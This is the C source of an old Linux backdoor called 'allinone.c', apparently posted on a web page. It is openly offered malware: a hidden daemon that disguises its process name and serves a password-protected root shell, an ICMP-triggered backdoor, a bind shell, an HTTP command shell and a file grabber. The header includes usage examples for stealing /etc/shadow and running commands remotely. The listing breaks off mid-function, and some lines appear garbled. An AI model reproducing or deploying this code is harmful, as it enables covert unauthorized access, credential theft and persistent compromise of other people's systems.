|
/**********************************************************
* allinone.c for HUC(2002)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the
extension, Visits other machines.
* it can give you a root shell.:)
*
* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow > shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:) --> your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:) --> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:) --> your password
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates.
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC, Http://www.cnhonker.net
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll's Transmit code, and thx Neil,con,iceblood for test.
*
*******************************************************/
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#define HTTPD_PORT 8008
#define BIND_PORT 8888
#define ICMP_PORT 8080
#define TRAN_PORT 1080
#define SIZEPACK 101
#define MAXSIZE 32768
#define TIMEOUT 120
#define CONNECT_NUMBER 1
#define HIDEME "[login] "
#define HIDEICMP "[su] "
#define HIDEFILE "[bash] "
#define GET_FILE "givemefile"
#define SHELL_NAME "givemeshell"
#define BIND_NAME "bindport"
#define TRAN_NAME "socks"
#define DISPART ":"
#define DISPART1 "::"
#define DISPART2 ":::"
#define PASSWORD "kissme:)"
#define MESSAGE "\r\n========Welcome to http://www.cnhonker.net========\r\n==========You get it, have a goodluck. :)=========\r\n\r\nYour command: \0"
#define GIVEPASS "\r\nEnter Your password: \0"
#define max(a, b) (a)>(b)?(a) : (b)
int maxfd, infd, outfd;
unsigned char ret_buf[32768];
int daemon_init(); /* init the daemon, if success return 0 other <0 */
void sig_chid(); /* wait the child die */
int TCP_listen(); /* success return 1 else return -1 */
char * read_file(); /* return the file content as a large string, buf value like GET /index.html HTTP:/1.1 */
ssize_t writen_file(); /* writen data to socket */
int bind_shell(); /* bind a root shell to a port */
int get_shell(); /* get me the root shell */
int icmp_shell(); /* icmp backdoor */
int socks(); /* socks */
int create_socket();
int create_serv();
int client_connect();
int quit();
void out2in();
char x2c(); /* http shell */
void unescape_url();
void plustospace();
/* The main function from here */
int main(int argc, char *argv[])
{
int fd, len, i, icmp;
int csocket;
struct sockaddr_in caddr;
char readstr[4000];
char *cbuf;
pid_t pid;
/* make it to a daemon */
/*signal(SIGHUP, SIG_IGN);*/
signal(SIGCHLD, sig_chid);
daemon_init();
if((pid = fork()) == -1) exit(0);
if(pid <= 0)
{
strcpy(argv[0], HIDEICMP);
icmp_shell();
}
fd = TCP_listen(HTTPD_PORT);
if(fd <= 0) return -1;
for(;;)
{
strcpy(argv[0], HIDEME);
/* check httpd */
len = sizeof(caddr);
if((csocket = accept(fd, &caddr, &len)) < 0) continue;
if((pid = fork()) == -1) continue;
if(pid <= 0)
{
strcpy (argv[0], HIDEFILE);
i = recv(csocket, readstr, 4000,0);
if (i == -1) break;
if( readstr[ i -1 ] != '\n' ) break;
readstr = '\0';
/*printf("Read from client: %s \n", readstr);*/
cbuf = read_file(readstr, csocket);
close(csocket);
}
close(csocket);
}
close(fd);
return(1);
}
/* init the daemon, if success return 0 other <0 */
int daemon_init()
{
struct sigaction act;
int i, maxfd;
if(fork() != 0) exit(0);
if(setsid() < 0) return(-1);
act.sa_handler = SIG_IGN;
/*act.sa_mask = 0;*/
act.sa_flags = 0;
sigaction(SIGHUP, &act, 0);
if(fork() != 0) exit(0);
chdir("/");
umask(0);
maxfd = sysconf(_SC_OPEN_MAX);
for(i=0; i<maxfd; i++)
close(i);
open("/dev/null", O_RDWR);
dup(0);
dup(1);
dup(2);
return(0);
}
/* wait the child die */
void sig_chid(int signo)
{
pid_t pid;
int stat;
while((pid = waitpid(-1, &stat, WNOHANG))>0);
printf("children %d died\n", pid);
return;
}
/* success return 1 else return -1 */
int TCP_listen(int port)
{
struct sockaddr_in laddr ;
int fd;
socklen_t len ;
fd = socket(AF_INET, SOCK_STREAM, 0);
len = sizeof(laddr) ;
memset(&laddr, 0, len) ;
laddr.sin_addr.s_addr = htonl(INADDR_ANY) ;
laddr.sin_family = AF_INET ;
laddr.sin_port = htons(port) ;
if((bind(fd, (const struct sockaddr *)&laddr, len))) return(-1);
if(listen(fd, 5)) return(-1);
return(fd);
}
/* http server */
char * read_file(char *buf, int fd)
{
char *erro=
"Content-type: text/html\n\n"
"HTTP/1.1 404 Not Found\n"
"Date: Mon, 14 Jan 2002 03:19:55 GMT\n"
"Server: Apache/1.3.22 (Unix)\n"
"Connection: close\n"
"Content-Type: text/html\n\n"
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 4.0//EN\">\n"
"<HTML><HEAD>\n"
"<TITLE>404 Not Found</TITLE>\n"
"</HEAD><BODY>\n"
"<H1>Not Found</H1>\n"
"The requested URL was not found on this server.<P>\n"
"<HR>\n"
"<ADDRESS>Apache/1.3.22 Server at localhost Port 8008</ADDRESS>\n"
"</BODY></HTML>\n\n";
char *bindok=
"Content-type: text/html\n\n"
"<html>\n<head><title>Bind Shell ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"center\"><p>\n"
"<font face=\"Arial\" color=\"#999999\" size=\"7\"><b>\n"
"You get it, goodluck! :-)\n"
"</b></font></p></div><br>\n"
"</body></html>\n\n";
char *tranok=
"Content-type: text/html\n\n"
"<html>\n<head><title>Tran ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"center\"><p>\n"
"<font face=\"Arial\" color=\"#999999\" size=\"7\"><b>\n"
"Tran ok!\n"
"</b></font></p></div><br>\n"
"</body></html>\n\n";
char *httpok1=
"Content-type: text/html\n\n"
"<html>\n<head><title>Shell ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"left\">\n"
"<pre><font face=\"Arial\" color=\"#999999\" size=\"2\">\n";
char *httpok2=
"</font></pre></div><br>\n"
"</body></html>\n\n";
char *yourcom=
"<b>Your Command:</b>\n";
char *br=
"<br>\n";
int listenp, targetp, i, j, c, bport;
char *cmd, *par, *op, *hp, *tp, *targeth, *command;
char *swap_file = "/tmp/tmp.txt";
char *setpath = "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:.";
FILE *f;
/* check give me shell */
cmd = buf;
par = strstr(cmd, PASSWORD);
if(par != NULL)
{
/*printf("Get Shell:\n");*/
get_shell(fd);
exit(0);
}
/* check bind root shell on a port */
par = strstr(cmd, BIND_NAME);
op = strstr(cmd, DISPART);
if(par != NULL && op != NULL)
{
bport = atoi(op + strlen(DISPART));
if(bport <= 0)
bport = BIND_PORT;
/*printf("Bind Port: %d\n", bport);*/
write(fd, bindok, strlen(bindok));
close(fd);
bind_shell(bport);
exit(0);
}
/* check Tran code */
par = strstr(cmd, TRAN_NAME);
op = strstr(cmd, DISPART);
hp = strstr(cmd, DISPART1);
tp = strstr(cmd, DISPART2);
if(par != NULL && op != NULL && hp != NULL && tp != NULL)
{
listenp = atoi(op + strlen(DISPART));
if(listenp <= 0)
listenp = TRAN_PORT;
targetp = atoi(tp + strlen(DISPART2));
if(targetp <= 0)
targetp = 23;
hp = (hp + strlen(DISPART1));
targeth = strncpy(ret_buf, hp,strlen(hp) - strlen(tp));
targeth[strlen(hp) - strlen(tp)] = '\0';
/*printf("Tran Port: listen %d port to %s %d port\n", listenp, targeth, targetp);*/
write(fd, tranok, strlen(tranok));
close(fd);
/*
listenp = 1080;
targetp = 21;
targeth = "192.168.0.14";
*/
socks(listenp, targeth, targetp);
exit(0);
}
/* check http shell */
par = strstr(cmd, SHELL_NAME);
op = strstr(cmd, DISPART);
if(par != NULL && op != NULL)
{
tp = buf + 5 + strlen(SHELL_NAME) + strlen(DISPART);
hp = strstr(tp, "HTTP");
if(hp != NULL) *hp = '\0';
tp[strlen(tp) - 1] = 0;
plustospace(tp);
unescape_url(tp);
/*printf("HTTP Shell: %s\n", tp);*/
c = j = strlen(tp);
tp[j] = ' ';j++;
tp[j] = ' ';j++;
tp[j] = '>';j++;
tp[j] = ' ';j++;
for(i = 0; i <= strlen(swap_file); i++, j++)
{
tp[j] = swap_file;
}
tp[j + strlen(swap_file)] = '\0';
command = tp;
/*printf("command: %s\n",command); */
setuid(0);
setgid(0);
chdir("/");
putenv(setpath);
/*printf("setpath ok!\n");*/
system(command);
/*printf("system ok!\n");*/
f = fopen(swap_file, "r");
if (f == NULL)
{
/*printf("Swap file error");*/
writen_file(fd, erro, strlen(erro));
return erro;
}
writen_file(fd, httpok1, strlen(httpok1));
writen_file(fd, yourcom, strlen(yourcom));
writen_file(fd, command, c);
writen_file(fd, br, strlen(br));
writen_file(fd, br, strlen(br));
while( !feof(f) )
{
i = fread(ret_buf, 1, 32768, f);
if (i == 0) break;
writen_file(fd, ret_buf, i);
}
fclose(f);
writen_file(fd, br, strlen(br));
writen_file(fd, httpok2, strlen(httpok2));
remove(swap_file);
exit(0);
}
/* check getfile */
par = NULL;
par = strstr(cmd, GET_FILE);
if(par != NULL)
{
op = buf + 5 + strlen(GET_FILE);
tp = strstr(op, "HTTP");
if(tp != NULL) *tp = '\0';
op[strlen(op) - 1] = 0;
/*printf("Get file: %s\n", op);*/
f = fopen(op, "r");
if (f == NULL)
{
writen_file(fd, erro, strlen(erro));
return erro;
}
while( !feof(f) )
{
i = fread(ret_buf, 1, 32768, f);
if (i == 0) break;
writen_file(fd, ret_buf, i);
}
fclose(f);
exit(0);
}
writen_file(fd, erro, strlen(erro));
close(fd);
exit(-1);
}
/* writen data to socket */
ssize_t writen_file(int fd, const void *vptr, size_t n)
{
size_t nleft;
ssize_t nwritten;
const char *ptr;
ptr = vptr;
nleft = n;
while(nleft > 0)
{
if((nwritten = write(fd, ptr, nleft)) <= 0)
{
if(errno == EINTR)
nwritten = 0;
else
return(-1);
}
nleft -= nwritten;
ptr += nwritten;
}
return(n);
}
/* bind root shell to a port */
int bind_shell(int port)
{
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
char passwd[15];
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
struct timeval testtime;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
chdir("/");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(port);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) 
